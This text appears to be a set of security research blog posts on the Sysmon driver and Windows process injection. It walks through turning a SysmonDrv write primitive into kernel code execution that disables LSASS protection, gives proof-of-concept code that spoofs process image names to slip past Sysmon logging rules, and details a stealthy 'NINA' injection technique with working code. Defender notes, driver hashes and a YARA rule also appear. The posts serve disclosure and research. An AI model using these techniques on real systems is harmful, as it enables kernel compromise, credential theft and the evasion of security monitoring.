Starting with the first problem, we can abuse the thread blocking done in the QueueFileDeleteEvent used to wait for the reply from the service returning the boolean value to determine whether a target file should be archived. This provides both reliability and safety of writing the stack pivot gadget. But we can only write a single byte before the event is signalled, continuing execution of QueueFileDeleteEvent. This means we cannot write the eight bytes needed to pivot the stack. To verify this assumption, I had a look into the KeSetEevent function that is called after the single byte write.

Early return from KeSetEvent

Looking at the disassembly, there is actually an early return that doesn't seem to do anything that would affect the state of the kernel as there are only reads and comparisons. So we have hope of writing more bytes before unblocking QueueFileDeleteEvent. If we set the pointer of the Event member to an address that contains the byte array 00 00 00 00 01 00 00 00, the first two checks will turn towards the early return. Since KeSetEvent is always called with a FALSE third argument, dil will always be 0.

This can be further abused to write multiple bytes in quick succession because we don't need to wait for more delete events to provide valid Event addresses. The first delete event's Event value can be stored until the stack pivot and other gadgets have been written. The saved Event can be passed to unblock QueueFileDeleteEvent and execute the ROP on demand.

We now have the requirements to bypass the thread unblocking to write more than a single byte. But how do we find these values in ntoskrnl.exe with ASLR?

To solve the problem of ASLR and finding the address of ExAllocatePoolWithTag, Windows provides the EnumDeviceDrivers function which returns an array of the current base addresses of all drivers loaded into the kernel. The following code snippet demonstrates how this can be done.

PVOID
GetDriverBase(
	_In_ PCWSTR DriverName
)
{
	ULONG ReturnLength = 0;
	PVOID Drivers[1024];
	WCHAR DriverNames[MAX_PATH];

	ZeroMemory(Drivers, sizeof(Drivers));

	if (!EnumDeviceDrivers(Drivers, sizeof(Drivers), &ReturnLength)) {
		PRINT_ERROR("EnumDeviceDrivers failed: %u\n", GetLastError());
		return NULL;
	}

	for (SIZE_T i = 0; i < ReturnLength / sizeof(Drivers[0]); i++) {
		ZeroMemory(DriverNames, sizeof(DriverNames));

		if (GetDeviceDriverBaseName(Drivers[i], DriverNames, ARRAYSIZE(DriverNames))) {
			if (StrStrI(DriverNames, DriverName)) {
				return Drivers[i];
			}
		}
	}

	return NULL;
}

Example code to get the kernel base address of a driver

To get offsets of a driver, LoadLibrary can be used to load them into the usermode process. Subtracting the base of the user-loaded module and then adding the kernel base address from EnumDeviceDrivers, we can calculate the correct kernel addresses.

PVOID
GetNtProc(
	_In_ PCSTR ProcName
)
{
	PVOID Proc = NULL;
	HMODULE NtBaseLib = NULL;
	PVOID ProcAddress = NULL;

	NtBaseLib = LoadLibrary(L"ntoskrnl.exe");
	if (!NtBaseLib) {
		return NULL;
	}

	Proc = GetProcAddress(NtBaseLib, ProcName);
	if (!Proc) {
		FreeLibrary(NtBaseLib);
		return NULL;
	}

	ProcAddress = (PVOID)((ULONG_PTR)GetDriverBase(L"ntoskrnl.exe") + (ULONG_PTR)Proc - (ULONG_PTR)NtBaseLib);

	FreeLibrary(NtBaseLib);

	return ProcAddress;
}

Example code to get the kernel address of a function in ntoskrnl.exe

The next problem is reading the allocated pool. Sysmon provides only one way of providing controllable data back to usermode and that is through event reporting. We can abuse this by writing the pool address to an event and then read it in the usermode process. The first thing I tried to do was to ROP into the QueueEvent using a custom event passed into rcx however, there were two issues. Calling QueueEvent will trigger a path that will call ExFreePool which will eventually cause a bug check with a stack issue. The reason for this is unknown to me but I could not get it to work. The alternative to this is to skip the beginning of the function and ROP into the code that queues the new event. Unfortunately, acquiring the mutex to manipulate g_EventReportList throws another bug check so this route won't work either.

To force this to work, a hack was needed. Since accessing g_EventReportList through QueueEvent was not feasible, directly accessing the event queue would still work but with some small issues: an event must already be queued and it must not be removed. Since a process does not need to be required to be "registered" by the driver to read events, Sysmon64.exe can still pull them from g_EventReportList despite our own process already interacting with the driver. To combat this, we can simply suspend the threads of Sysmon64.exe. If an event is not queued and the write of the pool address is attempted, the system will bug check with a corrupted list error. Because of this hack, it can be a point of failure.

Because we are writing to an existing event, we need to choose a member to overwrite. Sysmon events are usually formatted with a four-member header. Here's what the file delete event looks like as an example:

typedef struct _FILE_DELETE_EVENT {
	/*   0 */ ULONG Id;          // 0xF0000000 for file delete.
	/*   4 */ ULONG Size;        // Struct size.
	/*   8 */ PVOID Unk1;
	/*  10 */ PVOID Unk2;
	// Omitted for brevity
} FILE_DELETE_EVENT, *PFILE_DELETE_EVENT;

Event header members for Sysmon events

In all events that isn't the report event type, Unk1 and Unk2 are always 0. If we place them here, it can easily be determined if the pool was written or not simply by checking for a value. The usermode process can now read the allocated pool through the event list.

Injecting code into the pool is trivial. The data can be written quickly using the KeSetEvent bypass. The final problem we need solved is how the code is executed. The first few solutions involved spawning a thread using functions like PsCreateSystemThread, IoCreateSystemThread, IoQueueWorkItem, ExQueueWorkItem, and IoCreateDriver however, these all end up as bug checks either caused directly by the function or as a side effect from calling ExFreePool. No matter, we have an arbitrary write so we can simply take advantage of Sysmon's use of dynamic function resolutions to call our code. For example, Sysmon dynamically resolves ZwOpenProcessTokenEx and so we can just overwrite the value in the data section to point to our code's entry point. Luckily for us, Sysmon does not use Control Flow Guard.

SysmonDrv using dynamically resolved ZwOpenProcessTokenEx

Again, we need to handle the return safely so that restoration can be done to stop the kernel from panicking. We can simply return an erroneous NTSTATUS value or we can jump to ZwOpenProcessTokenEx from the shellcode after it finishes.

This concludes the issues that we had. We were able to transform a write-what-where primitive combined with a read provided by Sysmon allowing us to inject arbitrary data into the kernel. From there, we took advantage of dynamic function resolution to execute our code. It should be noted that if stack pivoting is used, there is a chance that the kernel may bug check on an invalid stack pointer location. It can be increased each time the pool fails to be read and requires more attempts.

Demonstration

As a proof-of-concept, I've developed some shellcode that disables LSASS PPL:

Notes for Defenders

This section was written by Samir with advice for defenders.

With the BYOV (Bring Your Own Vulnerability) option an attacker with the need to execute code or evade some kernel mode protection can leverage this technique and install a vulnerable Sysmon driver version. Thus it’s recommended to prevent the installation of those versions (as of writing this, versions before Sysmon v11.00 are not impacted).

Hashes of Impacted SysmonDrv versions:

35c67ac6cb0ade768ccf11999b9aaf016ab9ae92fb51865d73ec1f7907709dca
d2ed01cce3e7502b1dd8be35abf95e6e8613c5733ee66e749b972542495743b8
a86e063ac5214ebb7e691506a9f877d12b7958e071ecbae0f0723ae24e273a73
c0640d0d9260689b1c6c63a60799e0c8e272067dcf86847c882980913694543a
2a5e73343a38e7b70a04f1b46e9a2dde7ca85f38a4fb2e51e92f252dad7034d4
98660006f0e923030c5c5c8187ad2fe1500f59d32fa4d3286da50709271d0d7f
7e1d7cfe0bdf5f17def755ae668c780dedb027164788b4bb246613e716688840

Hashes for versions of SysmonDrv.sys

Although detection of these kind of techniques is hard (using Sysmon itself or Windows native logging), below is a listing of some suspicious key events prior to the exploitation completion.

Suspicious process attempting to access the Sysmon Service: note the PROCESS_SUSPEND_RESUME (0x0800) requested access (excludes generic access rights and alerts on sensitive ones).

Process Access event targeting Sysmon64.exe

Suspicious Process loading NT OS Kernel (should be rare and limited to the System virtual process):

Image Load event with ntoskrnl.exe

YARA Signature

rule Sysmon_KExec_KPPL {
meta:
 date = "30-09-2020"
 author = "SBousseaden"
 description = "hunt for possible injection with Instrumentation Callback PE"
 reference = "https://undev.ninja/p/9af8ac08-4879-4d87-a92b-ff4abc778908/"
strings:
 $sc1 = {90 51 B9 00 48 8D 0D DB 1F 00 00 44 89 7C 24 48 41 8B F7 4C 89 BD F0 01} 
 $sc2 = {65 C7 85 B8 01 00 00 48 8B 04 25} 
 $sc3 = {C7 85 BC 01 00 00 88 01 00 00 C7 85 C0 01 00}
 $sc4 = {DC 01 00 00 EA C6 80 ?? C7 85 E0 01 00 00 ?? 00 00 00 48}
 $sc5 = {C7 85 E4 01 00 00 48 B8 00 00 C7 85 EC 01 00 00 00 00 48 B9} 
 $sc6 = {48 89 01 59 66 C7 85 FC 01 00 00 FF E0}
 $sc7 = {65 48 8B 04 ?? ?? ?? 25 88 01 00}
 $sc8 = {48 8B 04 25 C7 85 4C 02 00 00 88 01}
 $sc9 = {48 89 01 59 66 C7}
 $ioc1 = {30 45 33 C9 C7 44 24 28 B8 FC 03 00 45 33 C0 BA 04 00 40 83 48 89 5C 24 20 48 8B}
 $ioc2 = {4C 89 74 24 30 BA 10 00 40 83 44 89 74 24 28 48 8B CE 4C 89}
 $sdrv1 = "SysmonDrv" wide
 $sdrv2 = "SysmonDrv"
condition: uint16(0) == 0x5a4d and 1 of ($sdrv*) and (2 of ($sc*) or 1 of ($ioc*))
}

Conclusion

This marks the end of the article. The file delete functionality was documented to the best of my ability and hopefully it is useful to someone. It would be great if someone more knowledgable could explain some of the things I couldn't.

Along with the internals, I think the bonus kernel code execution in SysmonDrv is pretty hilarious and ironic, repurposing Microsoft's own product that was built as a defensive tool for offensive and malicious intent. Ultimately, it does require administrative privileges to be abused and so it isn't a crtitical issue from a purely technical perspective (administrator to kernel isn't a security boundary!). However, because it is a Microsoft product and it's used as a trusted, core defensive component that's widely deployed, I personally feel like the impact is much greater. Having an issue like this in a security product may damage the reputation of Microsoft in some eyes. But as the product begins to pick up more functionality and increase in complexity, it's inevitable that security issues will be introduced. Microsoft should perform more internal testing for potential security issues and other bugs in future releases.

Anwyay, I hope that this can benefit and serve others more than it does to me, and that the reliability and capability of it can be improved (apologies for my amateur skill in exploit development). As always, my code can be found on my GitHub: https://github.com/NtRaiseHardError/Sysmon

Sysmon Image File Name Evasion

NtRaiseHardError — Wed, 17 Jun 2020 13:48:41 GMT

One of my side projects for understanding the Windows kernel and driver development includes research into the Sysmon driver. After having read some weird methods of how other drivers access processes' image file names on Twitter and in Bill Demirkapi's How to use Trend Micro's Rootkit Remover to Install a Rootkit blog post, I decided I should investigate further into what Sysmon did too. And so, the result is this post which looks at how Sysmon does it and what it does is mind-boggling. As for the how, I hope someone else can provide that for me!

Software versions and testing environments:

SysmonDrv version 11.0
SysmonDrv version 10.42
Windows 10 x64 version 2004

Discovery

My research into the Sysmon driver begins at version 10.42 (just a little bit outdated). I was trying to look into how Sysmon handles process access events in the ObRegisterCallbacks' post operation routine. This eventually led me to the function - that I will name GetProcessInfo - which is called in the event that a process has been detected to access another process:

GetProcessInfo to query the source process' image name

The blue arrow points to a call to ZwQueryInformationProcess with the ProcessBasicInformation value to retreive a PROCESS_BASIC_INFORMATION structure:

typedef struct _PROCESS_BASIC_INFORMATION {
    PVOID Reserved1;
    PPEB PebBaseAddress;
    PVOID Reserved2[2];
    ULONG_PTR UniqueProcessId;
    PVOID Reserved3;
} PROCESS_BASIC_INFORMATION;

PROCESS_BASIC_INFORMATION structure

At offset +8 (rbp-11h) in the ProcessInformation return value parameter (rbp-19h) lies the PebBaseAddress member which points to the Process Environment Block (PEB). This is passed into the GetProcessInfo function along with three other UNICODE_STRING values that indicate the source process' image file name, current directory, and command line. The last two strings are NULL so they do not return any value.

Inside the GetProcessInfo function, the driver attaches to the source process and reads the PEB:

Reading and copying the process' PEB structure

In the blue, the rbx register gets set to the PebBaseAddress value and then it is read from using ProbeForRead and what looks to be an optimised RtlCopyMemory. Next, it will read and copy the ProcessParameters member from the PEB structure:

Reading and copying the process' PEB's ProcessParameters member

After this, it calls an internal function that I've named GetProcessParameterString which takes both the recently read PEB and its ProcessParameters member. This specific call shown here also retrieves the ProcessParameters' ImagePathName member:

Retrieves ImagePathName from the PEB's ProcessParameters.

Within GetProcessParameterString, it performs the same ProbeForRead functionality as before:

GetProcessParameterString reads and copies ProcessParameters members

Returning back to the function that called GetProcessInfo, we can see that the CurrentProcessImageFileName variable is copied into the event data structure to be logged:

Copying source image process name into event structure for logging

POC

The PoC is as simple as:

PPEB Peb = (PPEB)__readgsqword(0x60);
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = Peb->ProcessParameters;
UNICODE_STRING FakeImagePathName = { 
    0x8, 0x8,
    L"Test"
};
    
ProcessParameters->ImagePathName = FakeImagePathName;

That's literally it.

Affected Events

So now that I know this function exists and takes multiple parameters (some are NULL'd out in what I've shown), I thought that surely there must be more uses of it elsewhere. Lo and behold, it is:

Affected events using GetProcessInfo

IDA's proximity view comes especially in handy here showing which functions lead to GetProcessInfo. File events, registry, and process access events are all affected, with varying degrees of impact on the event data which we shall see soon. Although the thread notification callback routine uses this function, the reason I've not highlighted is that the process cannot change its PEB data before control can be gained by the process (unless someone knows a way to do this too).

Luckily, there haven't been many changes between Sysmon 10.42 and 11.0 - I believe most of them were for the new file archiving functionality - so the issue persists.

Event ID 11 - FileCreate

FileCreate event with faked image

Event ID 23 - FileDelete

FileDelete event with faked image

While both of these file events can have false image values, the target file object's path cannot be modified.

Event ID 23 - RegistryEvent (Set Value)

Registry set value event with faked image

Event ID 12 - RegistryEvent (Add or Delete)

Registry add or delete event with fake image

Similar to the file events, the target registry object cannot be changed.

ProcessAccess

The ProcessAccess event has an additional CallTrace element that tracks the call stack. If we try the same PEB trick, we get the following:

ProcessAccess event with faked source image

Here, the CallTrace values reveal the true source image path. These values are obtained with the RtlWalkFrameChain function. The reason why I have included \Downloads\ in the string is so that Sysmon will trigger the event for demonstration purposes.

To get the image names, Sysmon enumerates the linked list of modules within the PEB for each address within the call stack. It will read the PEB's PEB_LDR_DATA structure first:

Read PEB's PEB_LDR_DATA structure

Then it will call the function - I named it GetBackTraceModuleInfo - passing in the PEB_LDR_DATA, InMemoryOrderModuleList list, the address to query (BackTraceEntry), and ModuleInfo:

Calling GetBackTraceModuleInfo

The proprietary ModuleInfo structure contains the following information:

typedef struct _MODULE_INFO {
    /*   0 */ WCHAR FullDllName[260];   // Module name.
    /* 208 */ PVOID Reserved;
    /* 210 */ PVOID DllBase;
    /* 218 */ ULONG SizeOfImage;
    /* 21C */ BOOLEAN IsWow64;
    /* 220 */ PVOID BackTraceAddress;
} MODULE_INFO, * PMODULE_INFO;

This function performs the module list enumeration to locate the module which contains the BackTraceEntry address. It is tested against DllBase and DllBase + SizeOfImage obtained from the LDR_DATA_TABLE_ENTRY structure:

Checking BackTraceEntry's address

Since this depends on user-mode data, it can be falsified just like the PEB's image file name. An interesting discovery is that the module list is iterated until either the end of the list is reached or if the enumeration hits 512 entries, whichever first:

List enumeration loop condition

This means that we don't have to modify the original module's entry, we can append a fake one.

PLIST_ENTRY MemList = Peb->Ldr->InMemoryOrderModuleList.Flink;
PLDR_DATA_TABLE_ENTRY SelfTableEntry = NULL;

for (ULONG_PTR i = 0; MemList != &Peb->Ldr->InMemoryOrderModuleList; i++) {
	PLDR_DATA_TABLE_ENTRY Ent = CONTAINING_RECORD(
		MemList,
		LDR_DATA_TABLE_ENTRY,
		InMemoryOrderLinks
	);
    
	if (!_wcsicmp(Ent->FullDllName.Buffer, argv[0])) {
		SelfTableEntry = Ent;
	}

	MemList = MemList->Flink;
}

LDR_DATA_TABLE_ENTRY FakeTableEntry;
if (SelfTableEntry) {
	//
	// Copy own module's image size and DLL base
	// to trick Sysmon.
	//
	FakeTableEntry.DllBase = SelfTableEntry->DllBase;
	//
	// SizeOfImage.
	//
	FakeTableEntry.Reserved3[1] = SelfTableEntry->Reserved3[1];
	//
	// Fake the image name.
	//
	FakeTableEntry.FullDllName = FakeImagePathName;

	//
	// Append to module list.
	//
	FakeTableEntry.InMemoryOrderLinks.Blink = MemList;
	FakeTableEntry.InMemoryOrderLinks.Flink = &Peb->Ldr->InMemoryOrderModuleList;
	MemList->Blink->Flink = &FakeTableEntry.InMemoryOrderLinks;
	Peb->Ldr->InMemoryOrderModuleList.Blink = &FakeTableEntry.InMemoryOrderLinks;
}

Appending fake LDR_DATA_TABLE_ENTRY module entry

The resulting log now reflects the fake process name in the CallTrace value:

Fake image name in CallTrace

Bypassing Logging

In the event where events have exclusions based on image names, it's possible to forge the image names using the above technique and stop Sysmon from logging the event entirely. Let's look at an example.

SwiftOnSecurity's Sysmon configuration file contains the following inclusions for the FileCreate event:

FileCreate event inclusion triggers

An example trigger here would be creating a file in the Downloads directory like so:

Creating a file in the Downloads directory logged by Sysmon

Now let's look at the exclusions for this event:

FileCreate event exclusions

If our image name is C:\Windows\system32\smss.exe, Sysmon would not log the event. Can we bypass Sysmon from logging?

Bypassing Sysmon's FileCreate event with faked image

We can see that Sysmon doesn't log the FileCreate event. Success!

Bonus Process Access Method

One of the sections in Bill Demirkapi's Trend Micro post discusses the EPROCESS ImageFileName Offset. If we have a look at the disassembly after the GetProcessInfo call from the ObRegisterCallbacks' post operation, we can see the GetProcessImageFileNameByHandle function:

GetProcessImageFileNameByHandle fallback method

This function is only triggered when GetProcessInfo fails. Let's see how it retrieves the image file name:

GetProcessImageFileNameByHandle function

The blue highlights the CurrentProcessImageFileName parameter which can be seen to receive a UNICODE_STRING pool buffer at the bottom. In the red, we can see that the global variable g_ProcessNameOffset is added onto the PEPROCESS object returned by ObReferenceObjecyByHandle. If we trace the origin of g_ProcessNameOffset, we get the following:

g_ProcessNameOffset origin

This essentially translates to:

PEPROCESS Process = IoGetCurrentProcess();

for (int g_ProcessNameOffset = 0; g_ProcessNameOffset < 0x3000; g_ProcessNameOffset++) {
    if (!strncmp("System", (PUCHAR)Process + g_ProcessNameOffset, strlen("System")) {
    	break;
    }
}

Of course there is proper API to access the ImageFileName offset in the EPROCESS structure (ZwQueryInformationProcess with ProcessImageFileName). So why does it exist? @analyzev notes on this Twitter thread that this function dates back to this RegMon source and it matches exactly with Sysmon's.

I believe this method of retrieving the image name can produce false results. If the file on disk is renamed or moved, the changes may not be reflected in the EPROCESS structure.

Conclusion

It's interesting to see critical data being retrieved in an unreliable and user-controlled way. I'm curious as to what impact this may have from a detection and forensics point of view. Events may slip by unnoticed or certain alerts may not fire if rules do not match where image names are used. Of course Sysmon shouldn't be the only source of logging and some of the affected events are not entirely untrustworthy so the overall effect may not be so concerning. But something to think about...

NINA: x64 Process Injection

NtRaiseHardError — Thu, 04 Jun 2020 07:50:47 GMT

In this post, I will be detailing an experimental process injection technique with a hard restriction on the usage of common and "dangerous" functions, i.e. WriteProcessMemory, VirtualAllocEx, VirtualProtectEx, CreateRemoteThread, NtCreateThreadEx, QueueUserApc, and NtQueueApcThread. I've called this technique NINA: No Injection, No Allocation. The aim of this technique is to be stealthy (obviously) by reducing the number of suspicious calls without the need for complex ROP chains. The PoC can be found here: https://github.com/NtRaiseHardError/NINA.

Tested environments:

Windows 10 x64 version 2004
Windows 10 x64 version 1903

Implementation: No Injection

Let's start with a solution that removes the need for data injection.

The most basic process injection requires a few basic ingredients:

A target address to contain the payload,
Passing the payload to the target process, and
An execution operation to execute the payload

To keep the focus on the No Injection section, I will use the classic VirtualAllocEx to allocate memory in the remote process. It is important to keep pages from having write and execute permissions at the same time so RW should be set initially and then re-protected with RX after the data has been written. Since I will discuss the No Allocation method later, we can set the pages to RWX for now to keep things simple.

If we restrict ourselves from using data injection, it means that the malicious process does not use WriteProcessMemory to directly transfer data from itself into the target process. To handle this, I was inspired by the reverse ReadProcessMemory documented by Deep Instinct's (complex) "Inject Me" process injection technique (shared to me by @slaeryan). There exists other methods of passing data into a process: using GlobalGetAtomName (from the Atom Bombing technique), and passing data through either the command line options or environment variables (with the CreateProcess call to spawn a target process). However, these three methods have one small limitation in that the payload must not contain NULL characters. Ghost Writing is also an option but it requires a complex ROP chain.

To gain execution, I've opted for a thread hijacking style technique using the crucial SetThreadContext function since we cannot use CreateRemoteThread, NtCreateThreadEx, QueueUserApc, and NtQueueApcThread.

Here is the procedure:

CreateProcess to spawn a target process,
VirtualAllocEx to allocate memory for the payload and a stack,
SetThreadContext to force the target process to execute ReadProcessMemory,
SetThreadContext to execute the payload.

CreateProcess

There are some considerations that should be taken when using this injection technique. The first comes from the CreateProcess call. Although this technique does not rely on CreateProcess, there are some reasons why it may be advantageous to use this instead of something like OpenProcess or OpenThread. One reason is that there is no remote (external) process access to obtain handles which could otherwise be detected by monitoring tools, such as Sysmon, that use ObRegisterCallbacks. Another reason is that it allows for the two aforementioned data injection methods using the command line and environment variables. If you're creating the process, you could also leverage blockdlls and ACG to defeat antivirus user-mode hooking.

VirtualAllocEx

Of course the target process needs to be able to house the payload but this technique also requires a stack. This will be made clear shortly.

ReadProcessMemory

To use this function in a reversed manner, we must consider two issues: passing argument five on the stack and using a valid process handle to our own malicious process. Let's look at the issue with the fifth argument first:

BOOL ReadProcessMemory(
  HANDLE  hProcess,
  LPCVOID lpBaseAddress,
  LPVOID  lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesRead
);

ReadProcessMemory arguments

Using SetThreadContext only allows for the first four arguments on x64. If we read the description for lpNumberOfBytesRead, we can see that it's optional:

A pointer to a variable that receives the number of bytes transferred into the specified buffer. If lpNumberOfBytesRead is NULL, the parameter is ignored.

Luckily, if we use VirtualAllocEx to create pages, the function will zero them:

Reserves, commits, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.

Setting the stack to the zero-allocated pages will provide a valid fifth argument.

The second problem is the process handle passed to ReadProcessMemory. Because we're trying to get the target process to read our malicious process, we need to give it a handle to our process. This can be achieved using the DuplicateHandle function. It will be given our current process handle and return a handle which can be used by the target process.

SetThreadContext

SetThreadContext is a powerful and flexible function that allows reads, writes, and executes. But there is a known issue with using it to pass fastcall arguments: the volatile registers RCX, RDX, R8 and R9 cannot be reliably set to desired values. Consider the following code:

    // Get target process to read shellcode
    SetExecutionContext(
    	// Target thread
        &TargetThread,
        // Set RIP to read our shellcode
        _ReadProcessMemory,
        // RSP points to stack
        StackLocation,
        // RCX: Handle to our own process to read shellcode
        TargetProcess,
        // RDX: Address to read from
        &Shellcode,
        // R8: Buffer to store shellcode
        TargetBuffer,
        // R9: Size to read
        sizeof(Shellcode)
    );

Forcing target process to execute ReadProcessMemory

If we execute this code, we expect the volatile registers to hold their correct values when the target thread reaches ReadProcessMemory. However, this is not what happens in practice:

Incorrect volatile registers for ReadProcessMemory

For some unknown reason, the volatile registers are changed and makes this technique unusable. RCX is not a valid handle to a process, RDX is zero and R9 is too big. There is a method that I have discovered that allows volatile registers to be set reliably: simply set RIP to an infinite jmp -2 loop before using SetThreadContext. Let's see it in action:

Infinite jmp -2 loop

The infinite loop can be executed using SetThreadContext, then ReadProcessMemory can be called with the correct volatile registers:

Correct volatile registers for ReadProcessMemory

Now we need to handle the return. Note that we allocated and pivoted to our own stack. If we can use ReadProcessMemory to read the shellcode into the stack location at RSP, we can set the first 8 bytes of the shellcode so that it will ret back into itself. Here is an example:

BYTE Shellcode[] = {
	// Placeholder for ret from ReadProcessMemory to Shellcode + 8
	0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE,
	// Shellcode starts here...
	0xEB, 0xFE, 0x01, 0x23, 0x45, 0x67, 0x89, 0xAA,
	0xBB, 0xCC, 0xDD, 0xEE, 0xFF, 0x90, 0x90, 0x90
};

Example shellcode

Stack and shellcode

RSP and R8 point to 000001F457C21000. The addresses going upwards will be used for the stack in the ReadProcessMemory call. The target buffer where the shellcode will be written is from R8 downwards. When ReadProcessMemory returns, it will use the first 8 bytes of the shellcode as the return address to 000001F457C21008 where the real shellcode starts:

ReadProcessMemory ret back into shellcode + 8

Implementation: No Allocation

Let's now discuss how we can improve by removing the need for VirtualAllocEx. This is a bit less trivial than the previous section because there are some initial issues that arise:

How will we set up the stack for ReadProcessMemory?
How will the shellcode be written and executed using ReadProcessMemory if there are no RWX sections?

But why should we need to allocate memory when it's already there for us to use? Keep in mind that if any existing pages in memory are affected, care needs to be taken to not overwrite any critical data if the original execution flow should be restored.

The Stack

If we cannot allocate memory for the stack,we can find an empty RW page to use. If there's a worry for the NULL fifth argument for ReadProcessMemory, that can be easily solved. If we don't want to overwrite potentially critical data, we can take advantage of section padding within possible RW pages that lie within the executable image. Of course, this assumes that there is padding available.

To locate RW pages within the executable image's memory range, we can locate the image's base address through the Process Environment Block (PEB), then use VirtualQueryEx to enumerate the range. This function will return information such as the protection and its size which can be used to find any existing RW pages and if they're appropriately sized for the shellcode.

    //
    // Get PEB.
    //
    NtQueryInformationProcess(
        ProcessHandle,
        ProcessBasicInformation,
        &ProcessBasicInfo,
        sizeof(PROCESS_BASIC_INFORMATION),
        &ReturnLength
    );
    
    //
    // Get image base.
    //
    ReadProcessMemory(
        ProcessHandle,
        ProcessBasicInfo.PebBaseAddress,
        &Peb,
        sizeof(PEB),
        NULL
    );
    ImageBaseAddress = Peb.Reserved3[1];
    
    //
    // Get DOS header.
    //
    ReadProcessMemory(
        ProcessHandle,
        ImageBaseAddress,
        &DosHeader,
        sizeof(IMAGE_DOS_HEADER),
        NULL
    );
    
    //
    // Get NT headers.
    //
    ReadProcessMemory(
        ProcessHandle,
        (LPBYTE)ImageBaseAddress + DosHeader.e_lfanew,
        &NtHeaders,
        sizeof(IMAGE_NT_HEADERS),
        NULL
    );
    
    //
    // Look for existing memory pages inside the executable image.
    //
    for (SIZE_T i = 0; i < NtHeaders.OptionalHeader.SizeOfImage; i += MemoryBasicInfo.RegionSize) {
        VirtualQueryEx(
            ProcessHandle,
            (LPBYTE)ImageBaseAddress + i,
            &MemoryBasicInfo,
            sizeof(MEMORY_BASIC_INFORMATION)
        );

        //
        // Search for a RW region to act as the stack.
        // Note: It's probably ideal to look for a RW section 
        // inside the executable image memory pages because
        // the padding of sections suits the fifth, optional
        // argument for ReadProcessMemory and WriteProcessMemory.
        //
        if (MemoryBasicInfo.Protect & PAGE_READWRITE) {
            //
            // Stack location in RW page starting at the bottom.
            //
        }
    }

Example code to query RW page for stack.

After locating the correct page, the position of the stack should be enumerated upwards from the bottom of the page (due to the nature of stacks) and a 0x0000000000000000 value should be found for ReadProcessMemory's fifth argument. This means that we need to make sure the stack offset is at least 0x28 from the bottom plus space for the shellcode.

                   +--------------+
                   |     ...      |
                   +--------------+ -0x30
    Should be 0 -> |     arg5     |
                   +--------------+ -0x28
                   |     arg4     |
                   +--------------+ -0x20
                   |     arg3     |
                   +--------------+ -0x18
                   |     arg2     |
                   +--------------+ -0x10
                   |     arg1     |
                   +--------------+ -0x8
                   |     ret      |
                   +--------------+ 0x0
                   |   Shellcode  |
Bottom of stack -> +--------------+

Stack offsets for ReadProcessMemory

Here is some code that demonstrates this:

    //
    // Allocate a stack to read a local copy.
    //
    Stack = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, AddressSize);

    //
    // Scan stack for NULL fifth arg
    //
    Success = ReadProcessMemory(
        ProcessHandle,
        Address,
        Stack,
        AddressSize,
        NULL
    );

    //
    // Enumerate from bottom (it's a stack).
    // Start from -5 * 8 => at least five arguments + shellcode.
    //
    for (SIZE_T i = AddressSize - 5 * sizeof(SIZE_T) - sizeof(Shellcode); i > 0; i -= sizeof(SIZE_T)) {
        ULONG_PTR* StackVal = (ULONG_PTR*)((LPBYTE)Stack + i);
        if (*StackVal == 0) {
            //
            // Get stack offset.
            //
            *StackOffset = i + 5 * sizeof(SIZE_T);
            break;
        }
    }

Example code to locate stack offset

In the case where there are no RW pages inside the executable's module, we can perform a fallback to write to the stack. To find a remote process' stack, we can do the following:

    NtQueryInformationThread(
        ThreadHandle,
        ThreadBasicInformation,
        &ThreadBasicInfo,
        sizeof(THREAD_BASIC_INFORMATION),
        &ReturnLength
    );

    ReadProcessMemory(
        ProcessHandle,
        ThreadBasicInfo.TebBaseAddress,
        &Tib,
        sizeof(NT_TIB),
        NULL
    );
    
    //
    // Get stack offset.
    //

Querying remote process's stack

The result inside Tib will contain the stack range addresses. With these values, we can use the code before to locate the appropriate offset starting from the bottom of the stack.

Writing the Shellcode

A main obstacle with no allocation is that we have to write the shellcode and then execute it in the same page. There is a way to do this without using VirtualProtectEx or complex ROP chains with this special function: WriteProcessMemory. Okay, I did say we couldn't use WriteProcessMemory to write the data from our process to the target but I didn't say that we couldn't force the target process to use it on itself. One of the hidden mechanisms inside WriteProcessMemory is that it will re-protect the target buffer's page accordingly to perform the write. Here we see that the target buffer's page is queried with NtQueryVirtualMemory:

WriteProcessMemory querying the target buffer's page

Then the page is de-protected for writing using NtProtectVirtualMemory:

WriteProcessMemory de-protecting the buffer's page before writing

If you've noticed, WriteProcessMemory modifies the shadow stack at the beginning of the function. In this case, we need to modify the shellcode to pad for the shadow stack:

BYTE Shellcode[] = {
	// Placeholder for ret from ReadProcessMemory to infinte jmp loop.
	0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE,
	// Pad for shadow stack.
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	// Shellcode starts here at Shellcode + 0x30...
	0xEB, 0xFE, 0x01, 0x23, 0x45, 0x67, 0x89, 0xAA,
	0xBB, 0xCC, 0xDD, 0xEE, 0xFF, 0x90, 0x90, 0x90
};

Updated example shellcode

Now we need to call both ReadProcessMemory and WriteProcessMemory sequentially. Going back to the return from ReadProcessMemory, we can simply jump back to the infinite jmp loop gadget to stall execution instead of the shellcode (it's in a non-executable page now):

ReadProcessMemory's ret address (00007FF6E13A3FC0) now contains the infinite jmp loop

This allows time for the malicious process to call another SetThreadContext to set RIP to WriteProcessMemory and reuse RSP from ReadProcessMemory. We can read the shellcode from the same location that was copied by ReadProcessMemory (+ 0x30 bytes to the actual shellcode) and target any page with execute permissions (again, assuming that there are RX sections).

    // Get target process to write the shellcode
    Success = SetExecutionContext(
        &ThreadHandle,
        // Set rip to read our shellcode
        &_WriteProcessMemory,
        // RSP points to same stack offset
        &StackLocation,
        // RCX: Target process' own handle
        (HANDLE)-1,
        // RDX: Buffer to store shellcode
        ShellcodeLocation,
        // R8: Address to write from
        (LPBYTE)StackLocation + 0x30,
        // R9: size to write
        sizeof(Shellcode) - 0x30,
        NULL
    );

Forcing target process to execute WriteProcessMemory

